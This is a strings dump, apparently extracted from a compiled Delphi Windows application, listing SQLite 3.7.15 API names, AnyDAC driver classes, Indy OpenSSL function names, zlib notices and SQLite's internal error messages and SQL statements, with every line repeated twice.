uADPhysSQLiteWrapper
uADPhysSQLiteWrapper
ESQLiteNativeException
ESQLiteNativeException
TSQLiteLib
TSQLiteLib
TSQLiteHandle
TSQLiteHandle
TSQLiteDatabase
TSQLiteDatabase
TSQLiteExtension
TSQLiteExtension
TSQLiteExtensionManager
TSQLiteExtensionManager
TSQLiteCollation
TSQLiteCollation
TSQLiteValueDef
TSQLiteValueDef
TSQLiteValue
TSQLiteValue
TSQLiteStmtVar
TSQLiteStmtVar
TSQLiteBind
TSQLiteBind
TSQLiteColumn
TSQLiteColumn
TSQLiteVariables
TSQLiteVariables
TSQLiteStatement
TSQLiteStatement
TSQLiteFuncVar
TSQLiteFuncVar
TSQLiteInput
TSQLiteInput
TSQLiteInputs
TSQLiteInputs
TSQLiteOutput
TSQLiteOutput
TSQLiteFunction
TSQLiteFunction
TSQLiteFunctionData
TSQLiteFunctionData
TSQLiteExpressionFunction
TSQLiteExpressionFunction
TSQLiteExpressionFunctionData
TSQLiteExpressionFunctionData
TSQLiteRTree
TSQLiteRTree
TSQLiteRTreeData
TSQLiteRTreeData
sqlite3_libversion
sqlite3_libversion
sqlite3_libversion_number
sqlite3_libversion_number
sqlite3_compileoption_used
sqlite3_compileoption_used
sqlite3_compileoption_get
sqlite3_compileoption_get
sqlite3_initialize
sqlite3_initialize
sqlite3_shutdown
sqlite3_shutdown
sqlite3_close
sqlite3_close
sqlite3_errcode
sqlite3_errcode
sqlite3_errmsg
sqlite3_errmsg
sqlite3_extended_result_codes
sqlite3_extended_result_codes
sqlite3_open
sqlite3_open
sqlite3_open_v2
sqlite3_open_v2
sqlite3_key
sqlite3_key
sqlite3_rekey
sqlite3_rekey
sqlite3_trace
sqlite3_trace
sqlite3_profile
sqlite3_profile
sqlite3_busy_timeout
sqlite3_busy_timeout
sqlite3_get_autocommit
sqlite3_get_autocommit
sqlite3_set_authorizer
sqlite3_set_authorizer
sqlite3_update_hook
sqlite3_update_hook
sqlite3_limit
sqlite3_limit
sqlite3_changes
sqlite3_changes
sqlite3_total_changes
sqlite3_total_changes
sqlite3_interrupt
sqlite3_interrupt
sqlite3_last_insert_rowid
sqlite3_last_insert_rowid
sqlite3_enable_shared_cache
sqlite3_enable_shared_cache
sqlite3_release_memory
sqlite3_release_memory
sqlite3_soft_heap_limit
sqlite3_soft_heap_limit
sqlite3_status
sqlite3_status
sqlite3_malloc
sqlite3_malloc
sqlite3_memory_used
sqlite3_memory_used
sqlite3_memory_highwater
sqlite3_memory_highwater
sqlite3_prepare
sqlite3_prepare
sqlite3_finalize
sqlite3_finalize
sqlite3_step
sqlite3_step
sqlite3_reset
sqlite3_reset
sqlite3_column_count
sqlite3_column_count
sqlite3_column_type
sqlite3_column_type
sqlite3_column_name
sqlite3_column_name
sqlite3_column_database_name
sqlite3_column_database_name
sqlite3_column_table_name
sqlite3_column_table_name
sqlite3_column_origin_name
sqlite3_column_origin_name
sqlite3_column_decltype
sqlite3_column_decltype
sqlite3_column_blob
sqlite3_column_blob
sqlite3_column_double
sqlite3_column_double
sqlite3_column_int64
sqlite3_column_int64
sqlite3_column_text
sqlite3_column_text
sqlite3_column_bytes
sqlite3_column_bytes
sqlite3_clear_bindings
sqlite3_clear_bindings
sqlite3_bind_parameter_count
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_parameter_name
sqlite3_bind_blob
sqlite3_bind_blob
sqlite3_bind_double
sqlite3_bind_double
sqlite3_bind_int64
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_null
sqlite3_bind_text
sqlite3_bind_text
sqlite3_bind_value
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_bind_zeroblob
sqlite3_value_type
sqlite3_value_type
sqlite3_value_blob
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_bytes
sqlite3_value_double
sqlite3_value_double
sqlite3_value_int64
sqlite3_value_int64
sqlite3_value_text
sqlite3_value_text
sqlite3_result_blob
sqlite3_result_blob
sqlite3_result_double
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error
sqlite3_result_error_code
sqlite3_result_error_code
sqlite3_result_int64
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_null
sqlite3_result_text
sqlite3_result_text
sqlite3_result_zeroblob
sqlite3_result_zeroblob
sqlite3_create_collation
sqlite3_create_collation
sqlite3_create_function
sqlite3_create_function
sqlite3_user_data
sqlite3_user_data
sqlite3_enable_load_extension
sqlite3_enable_load_extension
sqlite3_load_extension
sqlite3_load_extension
sqlite3_free
sqlite3_free
sqlite3_table_column_metadata
sqlite3_table_column_metadata
sqlite3_progress_handler
sqlite3_progress_handler
sqlite3_declare_vtab
sqlite3_declare_vtab
sqlite3_create_module
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_create_module_v2
sqlite3_vfs_find
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_vfs_unregister
sqlite3_backup_init
sqlite3_backup_init
sqlite3_backup_step
sqlite3_backup_step
sqlite3_backup_finish
sqlite3_backup_finish
sqlite3_backup_remaining
sqlite3_backup_remaining
sqlite3_backup_pagecount
sqlite3_backup_pagecount
sqlite3_wal_hook
sqlite3_wal_hook
sqlite3_wal_autocheckpoint
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_wal_checkpoint
sqlite3_rtree_geometry_callback
sqlite3_rtree_geometry_callback
sqlite3_blob_open
sqlite3_blob_open
sqlite3_blob_close
sqlite3_blob_close
sqlite3_blob_bytes
sqlite3_blob_bytes
sqlite3_blob_read
sqlite3_blob_read
sqlite3_blob_write
sqlite3_blob_write
sqlite3_vtab_config
sqlite3_vtab_config
sqlite3_vtab_on_conflict
sqlite3_vtab_on_conflict
SQLITE_INTEGER
SQLITE_INTEGER
SQLITE_FLOAT
SQLITE_FLOAT
SQLITE_TEXT
SQLITE_TEXT
SQLITE_BLOB
SQLITE_BLOB
SQLITE_NULL
SQLITE_NULL
sqlite3
sqlite3
PRIMARY KEY must be unique
PRIMARY KEY must be unique
ADsqlite3_compare
ADsqlite3_compare
sqlite3_column_xxx
sqlite3_column_xxx
8.ugj
8.ugj
zSql
zSql
sqlite_version
sqlite_version
SQLiteNativeException
SQLiteNativeException
TADPhysSQLiteDriverLink
TADPhysSQLiteDriverLink
uADPhysSQLite
uADPhysSQLite
TADPhysSQLiteDriver
TADPhysSQLiteDriver
TADPhysSQLiteConnection
TADPhysSQLiteConnection
TADPhysSQLiteTransaction
TADPhysSQLiteTransaction
TADPhysSQLitePostEventFunc
TADPhysSQLitePostEventFunc
TADPhysSQLiteEventAlerter
TADPhysSQLiteEventAlerter
TADSQLiteVarInfoRecD
TADSQLiteVarInfoRecD
TADPhysSQLiteCommand
TADPhysSQLiteCommand
@F:SQLite Database|*.sdb;*.db
@F:SQLite Database|*.sdb;*.db
ForeignKeys
ForeignKeys
SQLiteAdvanced
SQLiteAdvanced
foreign_keys
foreign_keys
TADPhysSQLiteEventMessageU
TADPhysSQLiteEventMessageU
DriverID=SQLite
DriverID=SQLite
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
des_set_key
des_set_key
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
TPasswordEvent
TPasswordEvent
Certificate
Certificate
RootCertFile\
RootCertFile\
CertFile\
CertFile\
KeyFile
KeyFile
OnGetPassword\
OnGetPassword\
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
Open SSL Support DLL Delphi and C Builder interface
Open SSL Support DLL Delphi and C Builder interface
hXXp://VVV.indyproject.org/
hXXp://VVV.indyproject.org/
1993 - 2004
1993 - 2004
https:
https:
\\.\Scsi%d:
\\.\Scsi%d:
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
inflate 1.0.4 Copyright 1995-1996 Mark Adler
inflate 1.0.4 Copyright 1995-1996 Mark Adler
8$4,8$4
8$4,8$4
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
3.7.15
3.7.15
SQLITE_
SQLITE_
d-d-d d:d:d
d-d-d d:d:d
d-d-d
d-d-d
failed to allocate %u bytes of memory
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
failed memory resize %u to %u bytes
922337203685477580
922337203685477580
API call with %s database connection pointer
API call with %s database connection pointer
RowKey
RowKey
GetProcessHeap
GetProcessHeap
OsError 0x%x (%u)
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
delayed %dms for lock/sharing conflict
%s-shm
%s-shm
%s\etilqs_
%s\etilqs_
%s\%s
%s\%s
Recovered %d frames from WAL file %s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
cannot limit WAL size: %s
SQLite format 3
SQLite format 3
invalid page number %d
invalid page number %d
2nd reference to page %d
2nd reference to page %d
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
failed to get page %d
failed to get page %d
freelist leaf count too big on page %d
freelist leaf count too big on page %d
Page %d:
Page %d:
unable to get the page. error code=%d
unable to get the page. error code=%d
btreeInitPage() returns error code %d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On tree page %d cell %d:
On page %d at right child:
On page %d at right child:
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Page %d is never used
Pointer map page %d is referenced
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
unknown database %s
unknown database %s
keyinfo(%d
keyinfo(%d
%s(%d)
%s(%d)
%s-mjXXXXXX9XXz
%s-mjXXXXXX9XXz
MJ delete: %s
MJ delete: %s
MJ collide: %s
MJ collide: %s
-mjX9X
-mjX9X
foreign key constraint failed
foreign key constraint failed
unable to use function %s in the requested context
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
zeroblob(%d)
zeroblob(%d)
abort at %d in [%s]: %s
abort at %d in [%s]: %s
constraint failed at %d in [%s]
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
no such savepoint: %s
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_temp_master
sqlite_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
database table is locked: %s
database table is locked: %s
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open value of type %s
cannot open virtual table: %s
cannot open virtual table: %s
cannot open view: %s
cannot open view: %s
no such column: "%s"
no such column: "%s"
foreign key
foreign key
indexed
indexed
cannot open %s column for writing
cannot open %s column for writing
misuse of aliased aggregate %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s.%s
%s: %s.%s
%s: %s.%s
not authorized to use function: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
too many SQL variables
too many SQL variables
too many columns in %s
too many columns in %s
EXECUTE %s%s SUBQUERY %d
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
misuse of aggregate: %s()
%.*s"%w"%s
%.*s"%w"%s
%s%.*s"%w"
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_parent
sqlite_rename_parent
%s OR name=%Q
%s OR name=%Q
type='trigger' AND (%s)
type='trigger' AND (%s)
sqlite_
sqlite_
table %s may not be altered
table %s may not be altered
there is already another table or index with this name: %s
there is already another table or index with this name: %s
view %s may not be altered
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_altertab_%s
sqlite_stat1
sqlite_stat1
sqlite_stat3
sqlite_stat3
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
DELETE FROM %Q.%s WHERE %s=%Q
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
invalid name: "%s"
too many attached databases - max %d
too many attached databases - max %d
database %s is already in use
database %s is already in use
Invalid key value
Invalid key value
unable to open database: %s
unable to open database: %s
no such database: %s
no such database: %s
cannot detach database %s
cannot detach database %s
database %s is locked
database %s is locked
sqlite_detach
sqlite_detach
sqlite_attach
sqlite_attach
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
object name reserved for internal use: %s
there is already an index named %s
there is already an index named %s
too many columns on %s
too many columns on %s
duplicate column name: %s
duplicate column name: %s
default value of column [%s] is not constant
default value of column [%s] is not constant
table "%s" has more than one primary key
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
sqlite_stat
table %s may not be dropped
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
indexed columns are not unique
indexed columns are not unique
table %s may not be indexed
table %s may not be indexed
views may not be indexed
views may not be indexed
virtual tables may not be indexed
virtual tables may not be indexed
there is already a table named %s
there is already a table named %s
index %s already exists
index %s already exists
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
table %s has no column named %s
table %s has no column named %s
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
a JOIN clause is required before %s
unable to identify the object to be reindexed
unable to identify the object to be reindexed
no such collation sequence: %s
no such collation sequence: %s
table %s may not be modified
table %s may not be modified
cannot modify %s because it is a view
cannot modify %s because it is a view
sqlite_source_id
sqlite_source_id
sqlite_log
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_used
sqlite_compileoption_get
sqlite_compileoption_get
foreign key mismatch
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
%d values for %d columns
%d values for %d columns
table %S has no column named %s
table %S has no column named %s
%s.%s may not be NULL
%s.%s may not be NULL
constraint %s failed
constraint %s failed
automatic extension loading failed: %s
automatic extension loading failed: %s
foreign_key_list
foreign_key_list
*** in database %s ***
*** in database %s ***
unsupported encoding: %s
unsupported encoding: %s
rekey
rekey
hexkey
hexkey
hexrekey
hexrekey
malformed database schema (%s)
malformed database schema (%s)
%s - %s
%s - %s
unsupported file format
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
%s:%d
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
no such index: %s
sqlite_subquery_%p_
sqlite_subquery_%p_
no such table: %s
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
no such trigger: %S
-- TRIGGER %s
-- TRIGGER %s
no such column: %s
no such column: %s
cannot VACUUM - SQL statements in progress
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor failed: %s
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
no such module: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s TABLE %s
%s AS %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid=?)
%s (rowid>? AND rowid)
%s (rowid>? AND rowid)
%s (rowid>?)
%s (rowid>?)
%s (rowid)
%s (rowid)
%s VIRTUAL TABLE INDEX %d:%s
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
%s (~%lld rows)
at most %d tables in a join
at most %d tables in a join
cannot use index: %s
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
SQL logic error or missing database
unknown operation
unknown operation
large file support is disabled
large file support is disabled
unknown database: %s
unknown database: %s
no such %s mode: %s
no such %s mode: %s
%s mode not allowed: %s
%s mode not allowed: %s
no such vfs: %s
no such vfs: %s
database corruption at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
cannot open file at line %d of [%.10s]
no such table column: %s.%s
no such table column: %s.%s
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
docid INTEGER PRIMARY KEY
docid INTEGER PRIMARY KEY
%z, 'c%d%q'
%z, 'c%d%q'
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
PRAGMA %Q.page_size
PRAGMA %Q.page_size
,%s(x.'c%d%q')
,%s(x.'c%d%q')
FROM '%q'.'%q%s' AS x
FROM '%q'.'%q%s' AS x
,%s(?)
,%s(?)
unrecognized parameter: %s
unrecognized parameter: %s
unrecognized matchinfo: %s
unrecognized matchinfo: %s
unrecognized order: %s
unrecognized order: %s
error parsing prefix parameter: %s
error parsing prefix parameter: %s
missing %s parameter in fts4 constructor
missing %s parameter in fts4 constructor
SELECT %s WHERE rowid = ?
SELECT %s WHERE rowid = ?
malformed MATCH expression: [%s]
malformed MATCH expression: [%s]
SELECT %s ORDER BY rowid %s
SELECT %s ORDER BY rowid %s
illegal first argument to %s
illegal first argument to %s
porter
porter
unknown tokenizer: %s
unknown tokenizer: %s
SELECT %s WHERE rowid=?
SELECT %s WHERE rowid=?
INSERT INTO %Q.'%q_content' VALUES(%s)
INSERT INTO %Q.'%q_content' VALUES(%s)
%s_segments
%s_segments
SELECT %s
SELECT %s
unrecognized matchinfo request: %c
unrecognized matchinfo request: %c
%d %d %d %d
%d %d %d %d
